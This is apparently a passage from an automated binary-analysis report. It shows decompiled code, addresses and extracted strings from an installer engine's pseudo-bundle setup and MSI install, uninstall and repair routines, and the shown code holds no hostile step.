																	__eflags = _a8 - 1;
																	if(__eflags > 0) {
																		L57:
																		_t114 = 0;
																		__eflags = 0;
																	} else {
																		if(__eflags < 0) {
																			L56:
																			_t114 = 1;
																		} else {
																			__eflags = _t173 - 0xfbbb0000;
																			if(_t173 > 0xfbbb0000) {
																				goto L57;
																			} else {
																				goto L56;
																			}
																		}
																	}
																	_t162 = _a68;
																	 *((intOrPtr*)(_t186 + 0xac)) = _t114;
																	__eflags = _t162;
																	if(_t162 != 0) {
																		_t174 = E00431078(0x10, 1);
																		 *((intOrPtr*)(_t186 + 0x84)) = _t174;
																		__eflags = _t174;
																		if(_t174 != 0) {
																			 *((intOrPtr*)(_t186 + 0x88)) = 1;
																			 *((intOrPtr*)(_t174 + 0xc)) =  *((intOrPtr*)(_t162 + 0xc));
																			_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)),  *_t162, 0);
																			__eflags = _t197;
																			if(_t197 < 0) {
																				goto L31;
																			} else {
																				_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)) + 4,  *((intOrPtr*)(_t162 + 4)), 0);
																				__eflags = _t197;
																				if(_t197 >= 0) {
																					_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)) + 8,  *((intOrPtr*)(_t162 + 8)), 0);
																					__eflags = _t197;
																					if(_t197 < 0) {
																						_push("Failed to copy display name for pseudo bundle.");
																						goto L66;
																					}
																				} else {
																					_push("Failed to copy version for pseudo bundle.");
																					goto L66;
																				}
																			}
																		} else {
																			_t188 = 0x8007000e;
																			_t197 = 0x8007000e;
																			E004300D9(_t118, "pseudobundle.cpp", 0x8d, 0x8007000e);
																			_push("Failed to allocate memory for dependency providers.");
																			goto L4;
																		}
																	}
																} else {
																	_t63 = _t186 + 0x9c; // 0x194
																	_t164 = _t63;
																	_t197 = E00433F88(_t63, _a64, 0);
																	__eflags = _t197;
																	if(_t197 >= 0) {
																		_t135 = _v8;
																		__eflags = _t135;
																		if(_t135 == 0) {
																			L52:
																			 *((intOrPtr*)(_t186 + 0x18)) = 1;
																			goto L53;
																		} else {
																			_t197 = E00433C35(0, _t164, _t135, 0);
																			__eflags = _t197;
																			if(_t197 >= 0) {
																				goto L52;
																			} else {
																				_push("Failed to append relation type to uninstall arguments for related bundle package");
																				goto L66;
																			}
																		}
																	} else {
																		_push("Failed to copy uninstall arguments for related bundle package");
																		goto L66;
																	}
																}
															} else {
																_t58 = _t186 + 0x98; // 0x190
																_t165 = _t58;
																_t197 = E00433F88(_t58, _a60, 0);
																__eflags = _t197;
																if(_t197 >= 0) {
																	_t139 = _v8;
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L45:
																		 *((intOrPtr*)(_t186 + 0xa8)) = 1;
																		goto L46;
																	} else {
																		_t197 = E00433C35(0, _t165, _t139, 0);
																		__eflags = _t197;
																		if(_t197 >= 0) {
																			goto L45;
																		} else {
																			_push("Failed to append relation type to repair arguments for related bundle package");
																			goto L66;
																		}
																	}
																} else {
																	_push("Failed to copy repair arguments for related bundle package");
																	goto L66;
																}
															}
														} else {
															_t197 = E00433C35(0, _t161, _t112, 0);
															__eflags = _t197;
															if(_t197 >= 0) {
																goto L39;
															} else {
																_push("Failed to append relation type to install arguments for related bundle package");
																goto L66;
															}
														}
													} else {
														_push("Failed to copy install arguments for related bundle package");
														goto L66;
													}
												} else {
													_push("Failed to copy cache id for pseudo bundle.");
													goto L66;
												}
											} else {
												L31:
												_push("Failed to copy key for pseudo bundle.");
												goto L66;
											}
										} else {
											_t199 = _a76;
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x30)) = E00431078(_t199, _t170);
											_t144 =  *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c))));
											__eflags =  *((intOrPtr*)(_t144 + 0x30));
											if( *((intOrPtr*)(_t144 + 0x30)) != 0) {
												 *((intOrPtr*)(_t144 + 0x34)) = _t199;
												E00426F91( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x34)), _a72, _t199);
												goto L22;
											} else {
												_t188 = 0x8007000e;
												_t197 = 0x8007000e;
												E004300D9(_t144, "pseudobundle.cpp", 0x4a, 0x8007000e);
												_push("Failed to allocate memory for pseudo bundle payload hash.");
												goto L4;
											}
										}
									} else {
										__eflags =  *_t98;
										if( *_t98 == 0) {
											goto L18;
										} else {
											_t197 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x40, _t98, 0);
											__eflags = _t197;
											if(_t197 >= 0) {
												_t170 = 0;
												__eflags = 0;
												goto L18;
											} else {
												_push("Failed to copy download source for pseudo bundle.");
												goto L66;
											}
										}
									}
								} else {
									_push("Failed to copy local source path for pseudo bundle.");
									goto L66;
								}
							} else {
								_push("Failed to copy filename for pseudo bundle.");
								goto L66;
							}
						} else {
							_push("Failed to copy key for pseudo bundle payload.");
							L66:
							_push(_t197);
							goto L67;
						}
					} else {
						_t188 = 0x8007000e;
						_t197 = 0x8007000e;
						E004300D9(_t83, "pseudobundle.cpp", 0x34, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L4;
					}
				} else {
					_t188 = 0x8007000e;
					_t197 = 0x8007000e;
					E004300D9(_t81, "pseudobundle.cpp", 0x30, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of related bundle struct");
					L4:
					_push(_t188);
					L67:
					E00430A57();
				}
				_t115 = _v8;
				if(_v8 != 0) {
					E004380AB(_t115);
				}
				return _t197;
			}



































                                                                                                                                                                  0x004229ce
                                                                                                                                                                  0x004229ce
                                                                                                                                                                  0x004229d1
                                                                                                                                                                  0x004229d8
                                                                                                                                                                  0x004229e2
                                                                                                                                                                  0x004229ee
                                                                                                                                                                  0x004229f3
                                                                                                                                                                  0x004229f3
                                                                                                                                                                  0x004229f6
                                                                                                                                                                  0x004229f7
                                                                                                                                                                  0x004229fe
                                                                                                                                                                  0x00422a03
                                                                                                                                                                  0x00422a06
                                                                                                                                                                  0x00422a0b
                                                                                                                                                                  0x00422a2f
                                                                                                                                                                  0x00422a3d
                                                                                                                                                                  0x00422a3f
                                                                                                                                                                  0x00422a42
                                                                                                                                                                  0x00422a44
                                                                                                                                                                  0x00422a63
                                                                                                                                                                  0x00422a69
                                                                                                                                                                  0x00422a74
                                                                                                                                                                  0x00422a79
                                                                                                                                                                  0x00422a7c
                                                                                                                                                                  0x00422a84
                                                                                                                                                                  0x00422a8b
                                                                                                                                                                  0x00422a8d
                                                                                                                                                                  0x00422aa8
                                                                                                                                                                  0x00422aaf
                                                                                                                                                                  0x00422ab1
                                                                                                                                                                  0x00422acc
                                                                                                                                                                  0x00422ad3
                                                                                                                                                                  0x00422ad5
                                                                                                                                                                  0x00422ae1
                                                                                                                                                                  0x00422ae4
                                                                                                                                                                  0x00422ae6
                                                                                                                                                                  0x00422ae8
                                                                                                                                                                  0x00422b11
                                                                                                                                                                  0x00422b11
                                                                                                                                                                  0x00422b15
                                                                                                                                                                  0x00422b6d
                                                                                                                                                                  0x00422b6d
                                                                                                                                                                  0x00422b70
                                                                                                                                                                  0x00422b73
                                                                                                                                                                  0x00422b80
                                                                                                                                                                  0x00422b82
                                                                                                                                                                  0x00422b83
                                                                                                                                                                  0x00422b83
                                                                                                                                                                  0x00422b75
                                                                                                                                                                  0x00422b75
                                                                                                                                                                  0x00422b78
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b7a
                                                                                                                                                                  0x00422b7a
                                                                                                                                                                  0x00422b7c
                                                                                                                                                                  0x00422b7c
                                                                                                                                                                  0x00422b78
                                                                                                                                                                  0x00422b88
                                                                                                                                                                  0x00422b8e
                                                                                                                                                                  0x00422b94
                                                                                                                                                                  0x00422b9d
                                                                                                                                                                  0x00422ba0
                                                                                                                                                                  0x00422ba3
                                                                                                                                                                  0x00422ba6
                                                                                                                                                                  0x00422bb1
                                                                                                                                                                  0x00422bb3
                                                                                                                                                                  0x00422ba8
                                                                                                                                                                  0x00422ba8
                                                                                                                                                                  0x00422bab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422bad
                                                                                                                                                                  0x00422bad
                                                                                                                                                                  0x00422bad
                                                                                                                                                                  0x00422bab
                                                                                                                                                                  0x00422bb4
                                                                                                                                                                  0x00422bb7
                                                                                                                                                                  0x00422bbe
                                                                                                                                                                  0x00422bc1
                                                                                                                                                                  0x00422bc8
                                                                                                                                                                  0x00422bcb
                                                                                                                                                                  0x00422bce
                                                                                                                                                                  0x00422bd1
                                                                                                                                                                  0x00422bd8
                                                                                                                                                                  0x00422bda
                                                                                                                                                                  0x00422bec
                                                                                                                                                                  0x00422bf0
                                                                                                                                                                  0x00422bf7
                                                                                                                                                                  0x00422bf9
                                                                                                                                                                  0x00422c0b
                                                                                                                                                                  0x00422c0b
                                                                                                                                                                  0x00422c17
                                                                                                                                                                  0x00422c19
                                                                                                                                                                  0x00422c1b
                                                                                                                                                                  0x00422c27
                                                                                                                                                                  0x00422c2a
                                                                                                                                                                  0x00422c2c
                                                                                                                                                                  0x00422c48
                                                                                                                                                                  0x00422c48
                                                                                                                                                                  0x00422c4c
                                                                                                                                                                  0x00422c9b
                                                                                                                                                                  0x00422c9b
                                                                                                                                                                  0x00422c9f
                                                                                                                                                                  0x00422ceb
                                                                                                                                                                  0x00422cf1
                                                                                                                                                                  0x00422cf7
                                                                                                                                                                  0x00422cfc
                                                                                                                                                                  0x00422cff
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d0b
                                                                                                                                                                  0x00422d0d
                                                                                                                                                                  0x00422d03
                                                                                                                                                                  0x00422d03
                                                                                                                                                                  0x00422d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d09
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d12
                                                                                                                                                                  0x00422d15
                                                                                                                                                                  0x00422d1b
                                                                                                                                                                  0x00422d1d
                                                                                                                                                                  0x00422d2c
                                                                                                                                                                  0x00422d2e
                                                                                                                                                                  0x00422d34
                                                                                                                                                                  0x00422d36
                                                                                                                                                                  0x00422d59
                                                                                                                                                                  0x00422d66
                                                                                                                                                                  0x00422d79
                                                                                                                                                                  0x00422d7b
                                                                                                                                                                  0x00422d7d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d83
                                                                                                                                                                  0x00422d98
                                                                                                                                                                  0x00422d9a
                                                                                                                                                                  0x00422d9c
                                                                                                                                                                  0x00422dba
                                                                                                                                                                  0x00422dbc
                                                                                                                                                                  0x00422dbe
                                                                                                                                                                  0x00422dc0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422dc0
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00422d9c
                                                                                                                                                                  0x00422d38
                                                                                                                                                                  0x00422d38
                                                                                                                                                                  0x00422d48
                                                                                                                                                                  0x00422d4a
                                                                                                                                                                  0x00422d4f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d4f
                                                                                                                                                                  0x00422d36
                                                                                                                                                                  0x00422ca1
                                                                                                                                                                  0x00422ca7
                                                                                                                                                                  0x00422ca7
                                                                                                                                                                  0x00422cb3
                                                                                                                                                                  0x00422cb5
                                                                                                                                                                  0x00422cb7
                                                                                                                                                                  0x00422cc3
                                                                                                                                                                  0x00422cc6
                                                                                                                                                                  0x00422cc8
                                                                                                                                                                  0x00422ce4
                                                                                                                                                                  0x00422ce4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cca
                                                                                                                                                                  0x00422cd4
                                                                                                                                                                  0x00422cd6
                                                                                                                                                                  0x00422cd8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00422cd8
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00422cb7
                                                                                                                                                                  0x00422c4e
                                                                                                                                                                  0x00422c54
                                                                                                                                                                  0x00422c54
                                                                                                                                                                  0x00422c60
                                                                                                                                                                  0x00422c62
                                                                                                                                                                  0x00422c64
                                                                                                                                                                  0x00422c70
                                                                                                                                                                  0x00422c73
                                                                                                                                                                  0x00422c75
                                                                                                                                                                  0x00422c91
                                                                                                                                                                  0x00422c91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c77
                                                                                                                                                                  0x00422c81
                                                                                                                                                                  0x00422c83
                                                                                                                                                                  0x00422c85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00422c85
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00422c64
                                                                                                                                                                  0x00422c2e
                                                                                                                                                                  0x00422c38
                                                                                                                                                                  0x00422c3a
                                                                                                                                                                  0x00422c3c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00422c3c
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422b17
                                                                                                                                                                  0x00422b17
                                                                                                                                                                  0x00422b26
                                                                                                                                                                  0x00422b2e
                                                                                                                                                                  0x00422b30
                                                                                                                                                                  0x00422b33
                                                                                                                                                                  0x00422b53
                                                                                                                                                                  0x00422b65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b35
                                                                                                                                                                  0x00422b35
                                                                                                                                                                  0x00422b42
                                                                                                                                                                  0x00422b44
                                                                                                                                                                  0x00422b49
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b49
                                                                                                                                                                  0x00422b33
                                                                                                                                                                  0x00422aea
                                                                                                                                                                  0x00422aea
                                                                                                                                                                  0x00422aed
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422aef
                                                                                                                                                                  0x00422aff
                                                                                                                                                                  0x00422b01
                                                                                                                                                                  0x00422b03
                                                                                                                                                                  0x00422b0f
                                                                                                                                                                  0x00422b0f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b05
                                                                                                                                                                  0x00422b05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b05
                                                                                                                                                                  0x00422b03
                                                                                                                                                                  0x00422aed
                                                                                                                                                                  0x00422ad7
                                                                                                                                                                  0x00422ad7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422ad7
                                                                                                                                                                  0x00422ab3
                                                                                                                                                                  0x00422ab3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422ab3
                                                                                                                                                                  0x00422a8f
                                                                                                                                                                  0x00422a8f
                                                                                                                                                                  0x00422dc5
                                                                                                                                                                  0x00422dc5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422dc5
                                                                                                                                                                  0x00422a46
                                                                                                                                                                  0x00422a46
                                                                                                                                                                  0x00422a53
                                                                                                                                                                  0x00422a55
                                                                                                                                                                  0x00422a5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422a5a
                                                                                                                                                                  0x00422a0d
                                                                                                                                                                  0x00422a0d
                                                                                                                                                                  0x00422a1a
                                                                                                                                                                  0x00422a1c
                                                                                                                                                                  0x00422a21
                                                                                                                                                                  0x00422a26
                                                                                                                                                                  0x00422a26
                                                                                                                                                                  0x00422dc6
                                                                                                                                                                  0x00422dc6
                                                                                                                                                                  0x00422dcc
                                                                                                                                                                  0x00422dcd
                                                                                                                                                                  0x00422dd4
                                                                                                                                                                  0x00422dd7
                                                                                                                                                                  0x00422dd7
                                                                                                                                                                  0x00422de0

                                                                                                                                                                  Strings
                                                                                                                                                                  • -%ls, xrefs: 004229E8
                                                                                                                                                                  • Failed to copy display name for pseudo bundle., xrefs: 00422DC0
                                                                                                                                                                  • pseudobundle.cpp, xrefs: 00422A15, 00422A4E, 00422B3D, 00422D43
                                                                                                                                                                  • Failed to copy key for pseudo bundle., xrefs: 00422BDC
                                                                                                                                                                  • Failed to copy install arguments for related bundle package, xrefs: 00422C1D
                                                                                                                                                                  • Failed to allocate memory for dependency providers., xrefs: 00422D4F
                                                                                                                                                                  • Failed to copy version for pseudo bundle., xrefs: 00422D9E
                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 00422A5A
                                                                                                                                                                  • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 00422CDA
                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 00422AD7
                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 00422B49
                                                                                                                                                                  • Failed to copy uninstall arguments for related bundle package, xrefs: 00422CB9
                                                                                                                                                                  • Failed to append relation type to repair arguments for related bundle package, xrefs: 00422C87
                                                                                                                                                                  • Failed to append relation type to install arguments for related bundle package, xrefs: 00422C3E
                                                                                                                                                                  • Failed to copy repair arguments for related bundle package, xrefs: 00422C66
                                                                                                                                                                  • Failed to copy cache id for pseudo bundle., xrefs: 00422BFB
                                                                                                                                                                  • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 00422A21
                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 00422B05
                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 00422A8F
                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 00422AB3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                                  • API String ID: 1617791916-2832335422
                                                                                                                                                                  • Opcode ID: e4591fa5e0ac917e0f5fd214371fb504b6125db97101d021575eaf19958fd38d
                                                                                                                                                                  • Instruction ID: 765c582088d96570264c1348384950232d5b38229ebcb6d62ab8363999c73855
                                                                                                                                                                  • Opcode Fuzzy Hash: e4591fa5e0ac917e0f5fd214371fb504b6125db97101d021575eaf19958fd38d
                                                                                                                                                                  • Instruction Fuzzy Hash: EAC1E371B50626BFDB658F25D981F6A76A8BF08714F94011BFC05EB350DBB8EC008B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041B2FA, Relevance: 36.7, Strings: 29, Instructions: 476COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                  			E0041B2FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed int _v8;
				char _v1584;
				signed int _v1588;
				char _v1592;
				signed int _v1596;
				char _v1600;
				char _v1604;
				char _v1608;
				intOrPtr* _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t136;
				signed int _t153;
				signed int _t155;
				signed int _t156;
				signed int _t158;
				signed int _t160;
				signed int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t168;
				signed int _t176;
				signed int _t178;
				void* _t187;
				void* _t191;
				signed int _t203;
				signed int _t209;
				signed int _t212;
				signed int _t216;
				intOrPtr _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr _t225;
				void* _t238;
				signed int _t240;
				void* _t246;
				intOrPtr _t249;
				intOrPtr _t251;
				void* _t256;
				char* _t263;
				intOrPtr _t268;
				void* _t271;
				intOrPtr _t273;
				signed int _t275;
				signed int _t285;
				signed int _t288;

				_t136 =  *0x4560d0; // 0xae480e18
				_v8 = _t136 ^ _t288;
				_v1636 = _a4;
				_v1616 = _a12;
				_t249 = _a16;
				_v1620 = _a20;
				_t273 = _a8;
				_v1632 = _a24;
				_push(0x628);
				_v1612 = _a28;
				_push(0);
				_push( &_v1584);
				_v1628 = _t249;
				E004267C0(_t249, __ecx, _t273, 0, __eflags);
				_v1600 = 0;
				_v1604 = 0;
				_v1608 = 0;
				_v1592 = 0;
				_v1588 = 0;
				_v1596 = 0;
				_t271 = 4;
				if(_t249 == 0) {
					L23:
					__eflags =  *(_t273 + 0x10) & 0x00000004;
					_t146 =  !=  ? 0x3fdf : 0x1fdf;
					_v1624 =  !=  ? 0x3fdf : 0x1fdf;
					_t275 = E00413BE9( &_v1608, _t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x24)),  &_v1608);
					__eflags = _t275;
					if(_t275 >= 0) {
						_t153 = E004314A9(_v1608,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x7c)))) + 0x18)),  &_v1592);
						__eflags = _t153;
						if(_t153 >= 0) {
							_t155 = E00435549( &_v1608, _t271, _v1620,  *((intOrPtr*)(_t273 + 0x14)), _v1636, _v1632, _t249,  &_v1584);
							__eflags = _t155;
							if(_t155 >= 0) {
								_t156 =  *(_t273 + 0xc);
								_t256 = 0;
								__eflags = _t156;
								if(_t156 == 0) {
									L35:
									_t158 = E0041AC12(_t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xac)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xb0)), _v1616, _t249,  &_v1588, _t256);
									__eflags = _t158;
									if(_t158 >= 0) {
										_t258 =  &_v1596;
										_t160 = E0041AC12(_t273,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xac)),  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0xb0)), _v1616, _t249,  &_v1596, 1);
										__eflags = _t160;
										if(_t160 >= 0) {
											_t162 = E0041A2CD(_t273,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x1c)),  &_v1588);
											__eflags = _t162;
											if(_t162 >= 0) {
												_t164 = E0041A2CD(_t273,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x1c)),  &_v1596);
												__eflags = _t164;
												if(_t164 >= 0) {
													_t166 = E0041A624(_t249,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x20)),  &_v1588);
													__eflags = _t166;
													if(_t166 >= 0) {
														_t168 = E0041A624(_t249,  *((intOrPtr*)(_t273 + 8)),  *((intOrPtr*)(_t273 + 0x20)),  &_v1596);
														__eflags = _t168;
														if(_t168 >= 0) {
															__eflags = _v1596;
															_t170 =  !=  ? _v1596 : 0x43b580;
															_push( !=  ? _v1596 : 0x43b580);
															_push(_v1592);
															_push(E0040E2BB( *((intOrPtr*)(_t273 + 0x18))));
															_push( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
															E00402003(2, 0x2000012d, E0040E8FD(_v1628));
															_t176 =  *((intOrPtr*)(_t273 + 0x18)) - 1;
															__eflags = _t176;
															if(_t176 == 0) {
																_t251 = 0;
																_t178 = E00433C35( &_v1596,  &_v1588, L" REBOOT=ReallySuppress", 0);
																__eflags = _t178;
																if(_t178 >= 0) {
																	_push(L"IGNOREDEPENDENCIES");
																	_t285 = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
																	__eflags = _t285;
																	if(__eflags >= 0) {
																		_t285 = E00434F98(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x90)), 0, 2, _v1588,  &_v1600);
																		__eflags = _t285 - 0x80070645;
																		if(_t285 == 0x80070645) {
																			E00402003(2, 0xa0000133,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
																			_t285 = 0;
																		}
																		__eflags = _t285;
																		if(_t285 >= 0) {
																			L6:
																			E00435855( &_v1584);
																			if(_v1588 != 0) {
																				E004380AB(_v1588);
																			}
																			if(_v1596 != 0) {
																				E004380AB(_v1596);
																			}
																			if(_v1592 != 0) {
																				E004380AB(_v1592);
																			}
																			if(_v1608 != 0) {
																				E004380AB(_v1608);
																			}
																			if(_v1604 != 0) {
																				E004380AB(_v1604);
																			}
																			_t187 = _v1600 - _t251;
																			if(_t187 == 0) {
																				 *_v1612 = _t251;
																			} else {
																				_t191 = _t187 - 1;
																				if(_t191 == 0) {
																					 *_v1612 = 1;
																				} else {
																					if(_t191 == 1) {
																						 *_v1612 = 2;
																					}
																				}
																			}
																			return L004267AF(_t285, _v8 ^ _t288, _t273, _t285);
																		} else {
																			_push("Failed to uninstall MSI package.");
																			L83:
																			_push(_t285);
																			E00430A57();
																			goto L6;
																		}
																	}
																	_push("Failed to add the list of dependencies to ignore to the properties.");
																	goto L83;
																}
																_push("Failed to add reboot suppression property on uninstall.");
																goto L83;
															}
															_t203 = _t176 - 1;
															__eflags = _t203;
															if(_t203 == 0) {
																_t251 = 0;
																__eflags = 0;
																L74:
																_t285 = E00433C35(_t258,  &_v1588, L" REBOOT=ReallySuppress", _t251);
																__eflags = _t285;
																if(__eflags >= 0) {
																	_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
																	__eflags = _t285;
																	if(_t285 >= 0) {
																		L78:
																		E0041AB5D(_t251, _t258, _t273, _t285,  *((intOrPtr*)(_t273 + 8)), _v1592);
																		goto L6;
																	}
																	_push("Failed to install MSI package.");
																	goto L83;
																}
																_push("Failed to add reboot suppression property on install.");
																goto L83;
															}
															_t209 = _t203 - 1;
															__eflags = _t209;
															if(_t209 == 0) {
																_t251 = 0;
																_t285 = E00433C35( &_v1596,  &_v1588, L" ACTION=ADMIN", 0);
																__eflags = _t285;
																if(_t285 >= 0) {
																	goto L74;
																}
																_push("Failed to add ADMIN property on admin install.");
																goto L83;
															}
															_t212 = _t209 - 1;
															__eflags = _t212;
															if(_t212 == 0) {
																L62:
																__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 4;
																if( *((intOrPtr*)(_t273 + 0x18)) == 4) {
																	L64:
																	_t263 = 0x43b580;
																	L65:
																	__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 4;
																	_t214 =  !=  ? "e" : "o";
																	__eflags = _v1588;
																	_push( !=  ? "e" : "o");
																	_t252 =  !=  ? _v1588 : 0x43b580;
																	_push(_t263);
																	_t216 = E00433CEA( &_v1588, L"%ls%ls REINSTALLMODE=\"cmus%ls\" REBOOT=ReallySuppress",  !=  ? _v1588 : 0x43b580);
																	__eflags = _t216;
																	if(_t216 >= 0) {
																		_push(L"IGNOREDEPENDENCIES");
																		__eflags = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
																		if(__eflags >= 0) {
																			_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
																			__eflags = _t285;
																			if(_t285 >= 0) {
																				L5:
																				_t251 = 0;
																				goto L6;
																			}
																			_push("Failed to run maintanance mode for MSI package.");
																			L27:
																			_push(_t285);
																			E00430A57();
																			goto L5;
																		}
																		_push("Failed to add the list of dependencies to ignore to the properties.");
																		goto L27;
																	}
																	_push("Failed to add reinstall mode and reboot suppression properties on repair.");
																	goto L27;
																}
																_t222 =  *((intOrPtr*)(_t273 + 8));
																__eflags =  *(_t222 + 0xb8);
